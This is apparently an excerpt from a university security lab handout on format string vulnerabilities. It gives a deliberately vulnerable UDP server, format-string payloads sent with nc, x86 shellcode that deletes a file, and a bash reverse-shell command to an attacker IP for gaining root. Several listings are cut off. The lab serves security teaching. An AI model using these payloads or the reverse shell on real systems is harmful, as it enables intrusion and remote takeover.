Attachment 1
Attachment 1
Attachment 1
1 Overview
The printf() function in C is used to print out a string according to a format. Its first argument is called
format string, which defines how the string should be formatted. Format strings use placeholders marked
by the % character for the printf() function to fill in data during the printing. The use of format strings
is not only limited to the printf() function; many other functions, such as sprintf(), fprintf(),
and scanf(), also use format strings. Some programs allow users to provide the entire or part of the
contents in a format string. If such contents are not sanitized, malicious users can use this opportunity to get
the program to run arbitrary code. A problem like this is called format string vulnerability.
The objective of this lab is for students to gain the first-hand experience on format string vulnerabilities
by putting what they have learned about the vulnerability from class into actions. Students will be given a
program with a format string vulnerability; their task is to exploit the vulnerability to achieve the following
damage: (1) crash the program, (2) read the internal memory of the program, (3) modify the internal mem-
ory of the program, and most severely, (4) inject and execute malicious code using the victim program’s
privilege. This lab covers the following topics:
Customization by instructor. Instructors should customize this lab by choosing a value for the
DUMMY SIZE constant, which is used during the compilation of the vulnerable program. Different val-
ues can make the solutions different. Please pick a value between 0 and 300 for this lab.
Readings and videos. Detailed coverage of the format string attack can be found in the following:
• Chapter 6 of the SEED Book, Computer & Internet Security: A Hands-on Approach, 2nd Edition, by
Wenliang Du. See details at https://www.handsonsecurity.net.
• Section 9 of the SEED Lecture at Udemy, Computer Security: A Hands-on Approach, by Wenliang
Du. See details at https://www.handsonsecurity.net/video.html.
• The lab also involves reverse shell, which is covered in Chapter 9 of the SEED book.
Lab environment. This lab has been tested on our pre-built Ubuntu 16.04 VM, which can be downloaded
from the SEED website.
SEED Labs – Format String Vulnerability Lab 2
2 Lab Tasks
To simplify the tasks in this lab, we turn off the address randomization using the following command:
$ sudo sysctl -w kernel.randomize_va_space=0
Listing 1: The vulnerable server program server.c (can be downloaded from the lab’s website)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
void main()
{
struct sockaddr_in server;
struct sockaddr_in client;
int clientLen;
char buf[1500];
helper();
while (1) {
bzero(buf, 1500);
recvfrom(sock, buf, 1500-1, 0,
(struct sockaddr *) &client, &clientLen);
myprintf(buf);
}
close(sock);
}
Compilation. Compile the above program. You will receive a warning message. This warning message
is a countermeasure implemented by the gcc compiler against format string vulnerabilities. We can ignore
this warning message for now.
// Note: N should be replaced by the value set by the instructor
$ gcc -DDUMMY_SIZE=N -z execstack -o server server.c
server.c: In function ’myprintf’:
server.c:13:5: warning: format not a string literal and no format arguments
[-Wformat-security]
printf(msg);
ˆ
It should be noted that the program needs to be compiled using the "-z execstack" option, which
allows the stack to be executable. This option has no impact on Tasks 1 to 5, but for Tasks 6 and 7, it is
important. In these two tasks, we need to inject malicious code into this server program’s stack space; if
the stack is not executable, Tasks 6 and 7 will fail. Non-executable stack is a countermeasure against stack-
based code injection attacks, but it can be defeated using the return-to-libc technique. To simplify this lab,
we simply disable this defeat-able countermeasure.
SEED Labs – Format String Vulnerability Lab 4
For instructors. To prevent students from using the solutions from the past (or from those posted on the
Internet), instructors can change the value for DUMMY SIZE by requiring students to compile the server
code using a different DUMMY SIZE value. Without the -DDUMMY SIZE option, DUMMY SIZE is set to
the default value 100 (defined in the program). When this value changes, the layout of the stack will change,
and the solution will be different. Students should ask their instructors for the value of N.
Running and testing the server. The ideal setup for this lab is to run the server on one VM, and then
launch the attack from another VM. However, it is acceptable if students use one VM for this lab. On the
server VM, we run our server program using the root privilege. We assume that this program is a privileged
root daemon. The server listens to port 9090. On the client VM, we can send data to the server using the
nc command, where the flag "-u" means UDP (the server program is a UDP server). The IP address in
the following example should be replaced by the actual IP address of the server VM, or 127.0.0.1 if the
client and server run on the same VM.
// On the server VM
$ sudo ./server
Yon can send any data to the server. The server program is supposed to print out whatever is sent by you.
However, a format string vulnerability exists in the server program’s myprintf() function, which allows
us to get the server program to do more than what it is supposed to do, including giving us a root access to
the server machine. In the rest of this lab, we are going to exploit this vulnerability.
• Question 1: What are the memory addresses at the locations marked by Ê, Ë, and Ì?
Higher Address
. . . .
Input provided by remote users
main() buf[1500] will be stored here.
3
. . . .
msg
myprintf() 2 Return Address
. . . .
1 format string
printf() Return Address
. . . . Lower Address
Figure 1: The stack layout when printf() is invoked from inside of the myprintf() function.
• Task 4.A: Stack Data. The goal is to print out the data on the stack (any data is fine). How many
format specifiers do you need to provide so you can get the server program to print out the first four
bytes of your input via a %x?
• Task 4.B: Heap Data There is a secret message stored in the heap area, and you know its address;
your job is to print out the content of the secret message. To achieve this goal, you need to place
the address (in the binary form) of the secret message in your input (i.e., the format string), but it is
difficult to type the binary data inside a terminal. We can use the following commands do that.
$ echo $(printf "\x04\xF3\xFF\xBF")%.8x%.8x | nc -u 10.0.2.5 9090
It should be noted that most computers are small-endian machines, so to store an address 0xAABBCCDD
(four bytes on a 32-bit machine) in memory, the least significant byte 0xDD is stored in the lower ad-
dress, while the most significant byte 0xAA is stored in the higher address. Therefore, when we store
the address in a buffer, we need to save it using this order: 0xDD, 0xCC, 0xBB, and then 0xAA.
Python code. Because the format string that we need to construct may be quite long, it is more convenient
to write a Python program to do the construction. The following sample code shows how to construct a
string that contains binary numbers.
Listing 2: Sample code build string.py (can be downloaded from the lab’s website)
#!/usr/bin/python3
import sys
SEED Labs – Format String Vulnerability Lab 6
• Task 5.A: Change the value to a different value. In this sub-task, we need to change the content of
the target variable to something else. Your task is considered as a success if you can change it to a
different value, regardless of what value it may be.
• Task 5.B: Change the value to 0x500. In this sub-task, we need to change the content of the
target variable to a specific value 0x500. Your task is considered as a success only if the variable’s
value becomes 0x500.
• Task 5.C: Change the value to 0xFF990000. This sub-task is similar to the previous one, except
that the target value is now a large number. In a format string attack, this value is the total number of
characters that are printed out by the printf() function; printing out this large number of characters
may take hours. You need to use a faster approach. The basic idea is to use %hn, instead of %n, so
we can modify a two-byte memory space, instead of four bytes. Printing out 216 characters does not
take much time. We can break the memory space of the target variable into two blocks of memory,
each having two bytes. We just need to set one block to 0xFF99 and set the other one to 0x0000.
This means that in your attack, you need to provide two addresses in the format string.
In format string attacks, changing the content of a memory space to a very small value is quite chal-
lenging (please explain why in the report); 0x00 is an extreme case. To achieve this goal, we need to
SEED Labs – Format String Vulnerability Lab 7
use an overflow technique. The basic idea is that when we make a number larger than what the storage
allows, only the lower part of the number will be stored (basically, there is an integer overflow). For
example, if the number 216 + 5 is stored in a 16-bit memory space, only 5 will be stored. Therefore,
to get to zero, we just need to get the number to 216 = 65, 536.
We need to execute the above shellcode command using the execve() system call, which means
feeding the following arguments to execve():
execve(address to the "/bin/bash" string, address to argv[], 0),
where argv[0] = address of the "/bin/bash" string,
argv[1] = address of the "-c" string,
argv[2] = address of the "/bin/rm /tmp/myfile" string,
argv[3] = 0
We need to write the machine code to invoke the execve() system call, which involves setting the
following four registers before invoking the "int 0x80" instruction.
eax = 0x0B (execve()’s system call number)
ebx = address of the "/bin/bash" string (argument 1)
ecx = address of argv[] (argument 2)
edx = 0 (argument 3, for environment variables; we set it to NULL)
Setting these four registers in a shellcode is quite challenging, mostly because we cannot have any zero
in the code (zero in string terminates the string). We provide the shellcode in the following. Detailed
explanation of shellcode can be found in the Buffer-Overflow Lab and in Chapter 4.7 of the SEED book
(2nd edition).
Listing 3: Shellcode in server exploit skeleton.py (can be downloaded from the lab’s website)
# The following code runs "/bin/bash -c ’/bin/rm /tmp/myfile’"
malicious_code= (
# Push the command ’/bin////bash’ into stack (//// is equivalent to /)
"\x31\xc0" # xorl %eax,%eax
"\x50" # pushl %eax
"\x68""bash" # pushl "bash"
"\x68""////" # pushl "////"
"\x68""/bin" # pushl "/bin"
"\x89\xe3" # movl %esp, %ebx
# Push the 1st argument ’-ccc’ into stack (-ccc is equivalent to -c)
SEED Labs – Format String Vulnerability Lab 8
# Set edx to 0
"\x31\xd2" #xorl %edx,%edx
You need to pay attention to the code between Lines À and Á. This is where we push the /bin/rm
command string into the stack. In this task, you do not need to modify this part, but for the next task, you
do need to modify it. The pushl instruction can only push a 32-bit integer into the stack; that is why we
break the string into several 4-byte blocks. Since this is a shell command, adding additional spaces do not
change the meaning of the command; therefore, if the length of the string cannot be divided by four, you
can always add additional spaces. The stack grows from high address to low address (i.e., reversely), so we
need to push the string also reversely into the stack.
In the shellcode, when we store "/bin/bash" into the stack, we store "/bin////bash", which
has a length 12, a multiple of 4. The additional "/" are ignored by execve(). Similarly, when we store
"-c" into the stack, we store "-ccc", increasing the length to 4. For bash, those additional c’s are
considered as redundant.
Please construct your input, feed it to the server program, and demonstrate that you can successfully
remove the target file. In your lab report, you need to explain how your format string is constructed. Please
mark on Figure 1 where your malicious code is stored (please provide the concrete address).
SEED Labs – Format String Vulnerability Lab 9
You need to modify the shellcode listed in Listing 3, so instead of running the /bin/rm command
using bash, your shellcode runs the following command. The example assumes that the attacker machine’s
IP address is 10.0.2.6, so you need to change the IP address in your code:
/bin/bash -c "/bin/bash -i > /dev/tcp/10.0.2.6/7070 0<&1 2>&1"
You only need to modify the code between Lines À and Á, so the above "/bin/bash -i ..."
command is executed by the shellcode, instead of the /bin/rm command. Once you finish the shellcode,
you should construct your format string, send it over to the victim server as an input. If your attack is
successful, your TCP server should get a callback, and you will get a root shell on the victim machine.
Please provide the evidence of success in your report (including screenshots).
3 Submission
You need to submit a detailed lab report, with screenshots, to describe what you have done and what you
have observed. You also need to provide explanation to the observations that are interesting or surprising.
Please also list the important code snippets followed by explanation. Simply attaching code without any
explanation will not receive credits.